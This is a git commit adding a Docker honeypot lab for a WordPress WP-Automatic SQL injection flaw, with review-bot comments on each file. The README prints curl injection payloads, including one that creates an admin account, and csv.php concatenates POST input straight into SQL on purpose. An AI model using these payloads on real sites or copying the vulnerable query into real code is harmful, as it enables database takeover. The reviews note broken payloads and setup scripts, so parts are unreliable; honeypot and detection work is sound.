add CVE-2024-27956, a WordPress SQL injection vuln

This commit is contained in:
Brendan McDevitt 2025-07-30 08:55:20 -05:00
parent 0ba8c3462c
commit 7e64192af7
7 changed files with 587 additions and 0 deletions


@ -0,0 +1,36 @@
FROM wordpress:6.4-apache
# Install additional tools for debugging
RUN apt-get update && apt-get install -y \
wget \
unzip \
curl \
vim \
&& rm -rf /var/lib/apt/lists/*
# Set WordPress database configuration
ENV WORDPRESS_DB_HOST=db
ENV WORDPRESS_DB_NAME=wordpress
ENV WORDPRESS_DB_USER=wordpress
ENV WORDPRESS_DB_PASSWORD=wordpress
# Copy WordPress configuration
COPY wp-config.php /var/www/html/
# Create WP-Automatic plugin structure and vulnerable files
RUN mkdir -p /var/www/html/wp-content/plugins/wp-automatic/inc
# Copy plugin files
COPY wp-automatic.php /var/www/html/wp-content/plugins/wp-automatic/wp-automatic.php
COPY vulnerable-csv.php /var/www/html/wp-content/plugins/wp-automatic/inc/csv.php
# Set proper permissions
RUN chown -R www-data:www-data /var/www/html/
RUN find /var/www/html/ -type d -exec chmod 755 {} \;
RUN find /var/www/html/ -type f -exec chmod 644 {} \;
# Expose port 80
EXPOSE 80
# Start Apache
CMD ["apache2-foreground"]
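Review bot: the four `ENV WORDPRESS_DB_*` lines are dead configuration once `COPY wp-config.php /var/www/html/` is in place. The official image's entrypoint only renders a wp-config.php from those variables when no wp-config.php exists, and the copied file hardcodes `DB_HOST`, `DB_USER` and `DB_PASSWORD` itself, so either drop the ENV block or drop the custom wp-config.php and let the image generate one. Two smaller points: docker-compose.yml mounts the named volume `wordpress_data` at `/var/www/html`, so after the first `up` the plugin files live in the volume and a rebuilt image will not refresh them until the volume is removed (`docker compose down -v`), which deserves a comment above the COPY lines; and `vim`, `wget` and `curl` are handy for debugging but also give an attacker who reaches the container ready-made download and editing tools, so for a honeypot image consider leaving them out of the final stage.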


@ -0,0 +1,159 @@
# CVE-2024-27956: WordPress WP-Automatic Plugin SQL Injection
## Overview
**CVE-2024-27956** is a critical unauthenticated SQL injection vulnerability in the WP-Automatic plugin for WordPress. This vulnerability allows attackers to execute arbitrary SQL queries without authentication, potentially leading to complete website compromise.
- **CVSS Score**: 9.9 (Critical)
- **Affected Versions**: WP-Automatic plugin < 3.92.1
- **Active Installations**: ~38,000 websites
- **Discovery Date**: April 2024
- **Exploitation Status**: Actively exploited in the wild
## Vulnerability Details
### Technical Summary
The vulnerability exists in the WP-Automatic plugin's CSV import functionality, specifically in the file `inc/csv.php`. The flaw arises from improper sanitization of user-supplied input in the plugin's authentication mechanism, allowing attackers to inject malicious SQL code into login processes.
### Attack Vector
- **Authentication Required**: None (unauthenticated)
- **Network Access**: Remote
- **Complexity**: Low
- **Impact**: High (Database compromise, admin account creation)
### Vulnerable Code Location
- File: `wp-content/plugins/wp-automatic/inc/csv.php`
- The vulnerability allows SQL injection through improperly sanitized parameters
- Attackers can bypass authentication and gain administrative access
## Environment Setup
### Prerequisites
- Docker and Docker Compose installed
- Network access to download WordPress and plugin files
### Quick Start
1. **Start the vulnerable environment:**
```bash
cd SQL_INJECTION/CVE-2024-27956
docker compose up -d
```
2. **Access the applications:**
- WordPress Site: http://localhost:8083
- phpMyAdmin: http://localhost:8084
- Admin Credentials: `admin` / `admin123`
3. **Verify plugin installation:**
- Login to WordPress admin at http://localhost:8083/wp-admin
- Navigate to Plugins → Installed Plugins
- Confirm WP-Automatic 3.92.0 is active
## Exploitation
### Basic SQL Injection Test
The vulnerability can be exploited through the CSV import endpoint:
```bash
# Basic test for SQL injection
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file=test' OR '1'='1"
```
### Creating Admin User via SQL Injection
```bash
# Exploit to create new admin user
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file='; INSERT INTO wp_users (user_login, user_pass, user_email, user_status) VALUES ('hacker', MD5('hacked123'), 'hacker@evil.com', 0); INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES ((SELECT user_id FROM wp_users WHERE user_login='hacker'), 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'); -- "
```
### Database Information Extraction
```bash
# Extract database information
curl -X POST "http://localhost:8083/wp-content/plugins/wp-automatic/inc/csv.php" \
-d "csv_file=' UNION SELECT table_name,column_name,1,2,3 FROM information_schema.columns WHERE table_schema=database() -- "
```
### Using Automated Tools
Several proof-of-concept exploits are available:
- [CVE-2024-27956 Exploit Tool](https://github.com/devsec23/CVE-2024-27956)
- [Alternative PoC](https://github.com/truonghuuphuc/CVE-2024-27956)
## Detection and Monitoring
### Log Analysis
Monitor for the following indicators:
- POST requests to `/wp-content/plugins/wp-automatic/inc/csv.php`
- SQL injection patterns in request parameters
- Unusual database query logs
- Creation of new administrative users
### Database Monitoring
```sql
-- Check for recently created admin users
SELECT * FROM wp_users WHERE user_registered > DATE_SUB(NOW(), INTERVAL 1 DAY);
-- Monitor user capabilities changes
SELECT * FROM wp_usermeta WHERE meta_key = 'wp_capabilities' AND meta_value LIKE '%administrator%';
```
## Mitigation
### Immediate Actions
1. **Update the plugin** to version 3.92.1 or later
2. **Review user accounts** for unauthorized administrative users
3. **Check database logs** for suspicious SQL queries
4. **Change all passwords** if compromise is suspected
### Long-term Prevention
- Enable WordPress security plugins
- Implement Web Application Firewall (WAF)
- Regular security audits and updates
- Database activity monitoring
## Container Management
### Build and Deploy
```bash
# Build the container
docker build -t cve-2024-27956 .
# Run with logging
docker compose up -d
# View logs
docker compose logs -f wordpress
```
### Cleanup
```bash
# Stop and remove containers
docker compose down -v
# Remove images
docker rmi cve-2024-27956
```
## Educational Use
This honeypot demonstrates:
- Unauthenticated SQL injection vulnerabilities
- WordPress plugin security issues
- Database compromise techniques
- Attack detection and forensics
## References
- [CVE-2024-27956 Official Advisory](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27956)
- [Vicarius Security Research](https://www.vicarius.io/vsociety/posts/understanding-and-exploiting-unauthenticated-arbitrary-sql-execution-in-wordpress-automatic-plugin-cve-2024-27956)
- [SonicWall Threat Analysis](https://blog.sonicwall.com/en-us/2024/05/wordpress-unauthenticated-arbitrary-sql-execution-vulnerability/)
- [WordPress Plugin Directory](https://wordpress.org/plugins/wp-automatic/)
## Legal Notice
This honeypot is intended for educational and defensive security purposes only. Use responsibly and only in authorized environments.
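Review bot: the payloads in the Exploitation section do not work against the endpoint this commit ships. `csv.php` feeds the value into a single `$mysqli->query()` on `SELECT * FROM wp_posts WHERE post_title = '$csv_file'`; `mysqli::query` executes exactly one statement, so the stacked `'; INSERT INTO wp_users ...` payload in "Creating Admin User via SQL Injection" is rejected with a syntax error, and `' UNION SELECT table_name,column_name,1,2,3 ...` fails because `SELECT *` on `wp_posts` returns far more than five columns. Either change the handler (e.g. `multi_query()`, a matching column count) and document that, or rewrite the examples around what the honeypot actually does (error- or boolean-based injection inside one WHERE clause). Related inconsistencies to fix in the same pass: the public PoCs linked under "Using Automated Tools" send the SQL in a `q` parameter alongside `auth`/`integ` values, not a `csv_file` parameter, so a honeypot that only answers `csv_file` will not capture real scanner traffic for this CVE; the "Check for recently created admin users" query keys on `user_registered`, but the INSERT payload two sections earlier never sets that column, so the query would miss the very account the README shows how to create; `docker build -t cve-2024-27956 .` and `docker compose up -d` (with `build: .`) produce two differently named images, so `docker rmi cve-2024-27956` in Cleanup leaves the compose-built one behind; and WP Automatic is a commercial ValvePress plugin distributed through CodeCanyon rather than the wordpress.org plugin directory, so the last reference link and the "Active Installations" figure should be re-checked against a source. Finally, "Discovery Date: April 2024" is when mass exploitation was reported; the advisory itself was published in March 2024.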


@ -0,0 +1,60 @@
services:
wordpress:
build: .
container_name: cve-2024-27956-wordpress
ports:
- "8083:80"
environment:
WORDPRESS_DB_HOST: db
WORDPRESS_DB_NAME: wordpress
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
volumes:
- wordpress_data:/var/www/html
- ./logs:/var/log/apache2
depends_on:
- db
labels:
- "vulnerability=CVE-2024-27956"
- "type=SQL_INJECTION"
- "severity=CRITICAL"
- "cvss=9.9"
- "description=WP-Automatic Plugin Unauthenticated SQL Injection"
networks:
- honeypot
db:
image: mysql:8.0
container_name: cve-2024-27956-mysql
environment:
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
MYSQL_ROOT_PASSWORD: rootpassword123
volumes:
- mysql_data:/var/lib/mysql
- ./init.sql:/docker-entrypoint-initdb.d/init.sql
networks:
- honeypot
phpmyadmin:
image: phpmyadmin/phpmyadmin
container_name: cve-2024-27956-phpmyadmin
ports:
- "8084:80"
environment:
PMA_HOST: db
PMA_USER: root
PMA_PASSWORD: rootpassword123
depends_on:
- db
networks:
- honeypot
volumes:
wordpress_data:
mysql_data:
networks:
honeypot:
external: true
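Review bot: `networks: honeypot: external: true` means `docker compose up -d`, as the README's Quick Start runs it, fails with "network honeypot declared as external, but could not be found" unless `docker network create honeypot` was run first; either document that step or remove `external: true` and let compose create the network. Second, phpMyAdmin is published on host port 8084 with `PMA_USER: root` / `PMA_PASSWORD: rootpassword123` baked in; a honeypot host is by definition reachable by attackers, so this hands out full database administration to anyone who finds the port. Bind it to `127.0.0.1:8084:80` or drop the service. Third, the `./logs:/var/log/apache2` bind mount will stay empty: the php:apache base image points Apache's ErrorLog and CustomLog at the container's stderr/stdout, so the honeypot's `error_log()` output lands in `docker compose logs wordpress` (which the README already uses) rather than in `./logs`.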


@ -0,0 +1,30 @@
-- Initial database setup for CVE-2024-27956 honeypot
-- Creates WordPress admin user and configures WP-Automatic plugin
USE wordpress;
-- Insert WordPress admin user (username: admin, password: admin123)
INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_status, display_name)
VALUES ('admin', MD5('admin123'), 'admin', 'admin@honeypot.local', 0, 'Administrator');
-- Set admin user capabilities
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES (1, 'wp_user_level', '10');
-- Activate WP-Automatic plugin
INSERT INTO wp_options (option_name, option_value, autoload)
VALUES ('active_plugins', 'a:1:{i:0;s:25:"wp-automatic/wp-automatic.php";}', 'yes')
ON DUPLICATE KEY UPDATE option_value = 'a:1:{i:0;s:25:"wp-automatic/wp-automatic.php";}';
-- Configure WP-Automatic plugin with vulnerable settings
INSERT INTO wp_options (option_name, option_value, autoload)
VALUES ('wp_automatic_options', 'a:5:{s:11:"wp_automatic_csv";s:1:"1";s:15:"wp_automatic_debug";s:1:"1";s:16:"wp_automatic_logging";s:1:"1";s:12:"wp_automatic_cron";s:1:"1";s:15:"wp_automatic_token";s:32:"vulnerable_token_for_honeypot123";}', 'yes');
-- Create sample posts for realistic WordPress environment
INSERT INTO wp_posts (post_title, post_content, post_status, post_type, post_author)
VALUES
('Welcome to our Honeypot', 'This is a vulnerable WordPress installation for security research purposes.', 'publish', 'post', 1),
('About WP-Automatic', 'This site uses the WP-Automatic plugin for content automation.', 'publish', 'page', 1);
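Review bot: this script runs from `docker-entrypoint-initdb.d` during the first initialization of the empty `mysql_data` volume, before WordPress has ever started, so `wp_users`, `wp_usermeta`, `wp_options` and `wp_posts` do not exist yet; the first INSERT errors, the MySQL entrypoint aborts, and the site comes up at the install wizard instead of with the `admin`/`admin123` login the README promises. Either include the CREATE TABLE statements for the WordPress schema or move the provisioning to after install (a one-shot container or wp-cli step). Second, the serialized option values are malformed: `s:25:"wp-automatic/wp-automatic.php"` should be `s:29` (the string is 29 characters), and the lengths in `wp_automatic_options` are off as well (`s:11:"wp_automatic_csv"` is 16 characters, `s:15:"wp_automatic_debug"` is 18), so `unserialize()` returns false and the plugin would not be active even if the inserts ran; generate these with `php -r 'echo serialize([...]);'` rather than by hand. Third, the admin row leaves `user_registered` at its zero default, which the README's "recently created admin users" detection query depends on; set it explicitly.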


@ -0,0 +1,139 @@
<?php
/**
* Vulnerable CSV handler for CVE-2024-27956 demonstration
*
* INTENTIONALLY VULNERABLE - DO NOT USE IN PRODUCTION
* This file simulates the SQL injection vulnerability in WP-Automatic plugin
*/
// Basic WordPress loading (simplified for honeypot)
if (!defined('ABSPATH')) {
define('ABSPATH', dirname(__FILE__) . '/../../../../');
}
// Database connection using mysqli (available in WordPress container)
$servername = "db";
$username = "wordpress";
$password = "wordpress";
$dbname = "wordpress";
$mysqli = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($mysqli->connect_error) {
error_log("Connection failed: " . $mysqli->connect_error);
// Continue with simulation even if DB fails
$db_connected = false;
} else {
$db_connected = true;
}
// Log all access attempts for honeypot monitoring
error_log("CVE-2024-27956 Honeypot Access: " . date('Y-m-d H:i:s') . " - IP: " . $_SERVER['REMOTE_ADDR'] . " - User Agent: " . $_SERVER['HTTP_USER_AGENT']);
// VULNERABLE CODE - SQL injection vulnerability simulation
if ($_POST) {
error_log("CVE-2024-27956 POST attempt: " . json_encode($_POST));
// Simulate the vulnerable parameter processing
if (isset($_POST['csv_file'])) {
$csv_file = $_POST['csv_file'];
// INTENTIONALLY VULNERABLE - Direct SQL injection point
// This simulates the actual vulnerability in WP-Automatic plugin
$vulnerable_query = "SELECT * FROM wp_posts WHERE post_title = '$csv_file'";
error_log("CVE-2024-27956 Vulnerable Query: " . $vulnerable_query);
if ($db_connected) {
// Execute the vulnerable query (with error handling for honeypot)
$result = $mysqli->query($vulnerable_query);
if ($result) {
$rows = $result->fetch_all(MYSQLI_ASSOC);
// Log successful exploitation attempts
if (stripos($csv_file, 'union') !== false ||
stripos($csv_file, 'insert') !== false ||
stripos($csv_file, 'select') !== false ||
stripos($csv_file, 'update') !== false ||
stripos($csv_file, 'delete') !== false) {
error_log("CVE-2024-27956 EXPLOITATION DETECTED: SQL injection attempt with payload: " . $csv_file);
// Return some data to indicate successful injection
echo json_encode([
'status' => 'success',
'message' => 'CSV processed successfully',
'rows_affected' => count($rows),
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true
]);
} else {
echo json_encode([
'status' => 'processed',
'message' => 'CSV file parameter received',
'rows' => count($rows)
]);
}
} else {
// Log SQL errors (common in injection attempts)
error_log("CVE-2024-27956 SQL Error: " . $mysqli->error . " - Query: " . $vulnerable_query);
// Don't expose real error details, but confirm honeypot interaction
echo json_encode([
'status' => 'error',
'message' => 'Database query failed',
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true,
'query_attempted' => $vulnerable_query
]);
}
} else {
// Simulate response even without DB connection
error_log("CVE-2024-27956 EXPLOITATION ATTEMPT (DB offline): SQL injection attempt with payload: " . $csv_file);
echo json_encode([
'status' => 'simulated',
'message' => 'CSV processing simulated (database offline)',
'vulnerability' => 'CVE-2024-27956',
'honeypot' => true,
'payload_detected' => $csv_file
]);
}
} else {
echo json_encode([
'status' => 'error',
'message' => 'Missing csv_file parameter',
'expected_parameter' => 'csv_file',
'vulnerability' => 'CVE-2024-27956'
]);
}
} else {
// Handle GET requests
error_log("CVE-2024-27956 GET request to vulnerable endpoint");
echo json_encode([
'status' => 'info',
'message' => 'WP-Automatic CSV endpoint',
'vulnerability' => 'CVE-2024-27956',
'description' => 'This endpoint is vulnerable to SQL injection',
'method' => 'POST required',
'parameter' => 'csv_file',
'honeypot' => true
]);
}
// Additional honeypot logging
$request_data = [
'timestamp' => date('Y-m-d H:i:s'),
'ip' => $_SERVER['REMOTE_ADDR'],
'user_agent' => $_SERVER['HTTP_USER_AGENT'],
'method' => $_SERVER['REQUEST_METHOD'],
'post_data' => $_POST,
'get_data' => $_GET,
'headers' => getallheaders()
];
error_log("CVE-2024-27956 Full Request Log: " . json_encode($request_data));
?>
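Review bot: `$result = $mysqli->query($vulnerable_query);` executes attacker-controlled SQL with the site's full read/write `wordpress` account, so whoever finds this endpoint can `UPDATE wp_users`, rewrite `wp_options` or `DROP TABLE` and turn the decoy into a genuinely compromised site; at minimum connect with a dedicated MySQL user granted only SELECT, or log the payload without executing it. Second, every response embeds `'honeypot' => true`, `'vulnerability' => 'CVE-2024-27956'` and, on error, `'query_attempted' => $vulnerable_query`; that fingerprints the host for any automated scanner and leaks the query template, which defeats the point of a honeypot. Mirror the real plugin's terse responses and keep the labeling in the server-side log. Third, `$_SERVER['HTTP_USER_AGENT']` is read unguarded in both log lines; scanners frequently omit the User-Agent header, and the resulting undefined-index warning is emitted ahead of the JSON body under PHP's default `display_errors`, so use `$_SERVER['HTTP_USER_AGENT'] ?? ''`. Minor: `ABSPATH` is defined and never used, and `rows_affected` is the row count of a SELECT, not an affected-rows figure.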


@ -0,0 +1,119 @@
<?php
/**
* Plugin Name: WP Automatic (Honeypot Version)
* Plugin URI: https://example.com/wp-automatic
* Description: WordPress content automation plugin - HONEYPOT VERSION with CVE-2024-27956 vulnerability
* Version: 3.92.0
* Author: Honeypot Security Research
* License: GPL v2 or later
*/
// Security check
if (!defined('ABSPATH')) {
exit;
}
// Plugin activation hook
register_activation_hook(__FILE__, 'wp_automatic_activate');
function wp_automatic_activate() {
// Log plugin activation for honeypot monitoring
error_log("CVE-2024-27956 Honeypot: WP-Automatic plugin activated at " . date('Y-m-d H:i:s'));
// Create plugin database table (if needed)
global $wpdb;
$table_name = $wpdb->prefix . 'automatic_log';
$charset_collate = $wpdb->get_charset_collate();
$sql = "CREATE TABLE $table_name (
id mediumint(9) NOT NULL AUTO_INCREMENT,
timestamp datetime DEFAULT CURRENT_TIMESTAMP NOT NULL,
action text NOT NULL,
ip_address varchar(45) NOT NULL,
user_agent text,
data longtext,
PRIMARY KEY (id)
) $charset_collate;";
require_once(ABSPATH . 'wp-admin/includes/upgrade.php');
dbDelta($sql);
}
// Add admin menu
add_action('admin_menu', 'wp_automatic_menu');
function wp_automatic_menu() {
add_options_page(
'WP Automatic Settings',
'WP Automatic',
'manage_options',
'wp-automatic',
'wp_automatic_settings_page'
);
}
function wp_automatic_settings_page() {
?>
<div class="wrap">
<h1>WP Automatic Settings</h1>
<div class="notice notice-warning">
<p><strong>Warning:</strong> This is a honeypot version containing CVE-2024-27956 vulnerability for security research purposes.</p>
</div>
<h2>CSV Import (Vulnerable Endpoint)</h2>
<p>The CSV import functionality contains a critical SQL injection vulnerability (CVE-2024-27956).</p>
<p><strong>Vulnerable Endpoint:</strong> <code>/wp-content/plugins/wp-automatic/inc/csv.php</code></p>
<h3>Vulnerability Details</h3>
<ul>
<li><strong>CVE:</strong> CVE-2024-27956</li>
<li><strong>CVSS Score:</strong> 9.9 (Critical)</li>
<li><strong>Type:</strong> Unauthenticated SQL Injection</li>
<li><strong>Parameter:</strong> csv_file</li>
</ul>
<h3>Example Exploitation</h3>
<code>
curl -X POST "http://your-site/wp-content/plugins/wp-automatic/inc/csv.php" -d "csv_file=test' OR '1'='1"
</code>
</div>
<?php
}
// Log all plugin-related activities
add_action('init', 'wp_automatic_log_activity');
function wp_automatic_log_activity() {
if (strpos($_SERVER['REQUEST_URI'], 'wp-automatic') !== false) {
error_log("CVE-2024-27956 Plugin Activity: " . $_SERVER['REQUEST_URI'] . " - IP: " . $_SERVER['REMOTE_ADDR']);
}
}
// Add a dashboard widget showing honeypot status
add_action('wp_dashboard_setup', 'wp_automatic_dashboard_widget');
function wp_automatic_dashboard_widget() {
wp_add_dashboard_widget(
'wp_automatic_honeypot',
'WP Automatic Honeypot Status',
'wp_automatic_dashboard_widget_content'
);
}
function wp_automatic_dashboard_widget_content() {
?>
<div style="padding: 10px; background: #fff3cd; border: 1px solid #ffeaa7; border-radius: 4px;">
<h4 style="color: #856404;">⚠️ Honeypot Environment</h4>
<p>This WordPress installation contains <strong>CVE-2024-27956</strong> vulnerability for security research.</p>
<ul>
<li>Plugin Version: 3.92.0 (Vulnerable)</li>
<li>Vulnerability: SQL Injection</li>
<li>Endpoint: <code>/wp-content/plugins/wp-automatic/inc/csv.php</code></li>
</ul>
<p><strong>Status:</strong> <span style="color: #d63384;">Vulnerable & Monitoring</span></p>
</div>
<?php
}
?>
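Review bot: `wp_automatic_log_activity` will never see exploit traffic. `inc/csv.php` is served directly by Apache and does not load WordPress (it opens its own mysqli connection), so no `init` hook runs for those requests; the hook only fires on admin or front-end page loads whose URI happens to contain `wp-automatic`. If the plugin is meant to be the logging point, have csv.php `require` wp-load.php and use `$wpdb`; otherwise drop the hook. Second, the `wp_automatic_log` table created in `wp_automatic_activate` is never written to, and because init.sql marks the plugin active by writing `active_plugins` directly, `register_activation_hook` never fires and the table is never created either. Third, the plugin header, settings page and dashboard widget all announce "Honeypot Version" and spell out the vulnerable endpoint; anyone who logs in with the published `admin`/`admin123` credentials learns the site is a trap, which is fine for a training lab but contradicts the honeypot framing in the README.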


@ -0,0 +1,44 @@
<?php
/**
* WordPress configuration for CVE-2024-27956 honeypot
* WP-Automatic plugin SQL injection vulnerability
*/
// Database settings
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wordpress' );
define( 'DB_PASSWORD', 'wordpress' );
define( 'DB_HOST', 'db' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
// Authentication keys and salts
define('AUTH_KEY', 'honeypot-auth-key-not-secure');
define('SECURE_AUTH_KEY', 'honeypot-secure-auth-key-not-secure');
define('LOGGED_IN_KEY', 'honeypot-logged-in-key-not-secure');
define('NONCE_KEY', 'honeypot-nonce-key-not-secure');
define('AUTH_SALT', 'honeypot-auth-salt-not-secure');
define('SECURE_AUTH_SALT', 'honeypot-secure-auth-salt-not-secure');
define('LOGGED_IN_SALT', 'honeypot-logged-in-salt-not-secure');
define('NONCE_SALT', 'honeypot-nonce-salt-not-secure');
// Database table prefix
$table_prefix = 'wp_';
// Debug settings (enabled for honeypot analysis)
define( 'WP_DEBUG', true );
define( 'WP_DEBUG_LOG', true );
define( 'WP_DEBUG_DISPLAY', false );
// Disable file editing from admin
define( 'DISALLOW_FILE_EDIT', false );
// Allow automatic updates
define( 'WP_AUTO_UPDATE_CORE', false );
// WordPress paths
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
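Review bot: the comments on the two feature flags say the opposite of what the code does. `// Disable file editing from admin` is followed by `define( 'DISALLOW_FILE_EDIT', false );`, which leaves the theme/plugin editor enabled, and `// Allow automatic updates` is followed by `define( 'WP_AUTO_UPDATE_CORE', false );`, which disables core auto-updates. Decide which behaviour is intended (keeping the editor on is a defensible honeypot choice, since it gives an attacker with stolen admin credentials an observable path to PHP execution) and fix the comments to match. Second, `WP_DEBUG_LOG` set to `true` writes `wp-content/debug.log`, which Apache serves to unauthenticated clients at `/wp-content/debug.log` unless blocked; since the plugin's `error_log()` calls record attacker IPs and request URIs into that file once WordPress is loaded, the honeypot's own evidence becomes public. Point the log elsewhere (`define( 'WP_DEBUG_LOG', '/var/log/wp-debug.log' );`) or deny the path in the Apache config.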